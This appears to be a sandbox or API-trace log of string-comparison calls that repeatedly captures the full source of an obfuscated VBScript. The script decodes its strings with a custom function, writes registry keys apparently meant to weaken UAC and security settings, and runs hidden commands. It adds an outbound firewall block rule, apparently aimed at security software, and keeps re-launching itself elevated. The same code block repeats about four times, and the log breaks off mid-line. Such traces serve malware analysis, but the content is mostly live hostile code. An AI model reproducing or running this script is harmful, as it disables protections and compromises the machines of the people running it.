bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 40 [0222.965] wcsncmp (_String1=" + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0222.965] wcsncmp (_String1="+ (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 30 [0222.965] wcsncmp (_String1=" (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0222.965] wcsncmp (_String1="(asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run 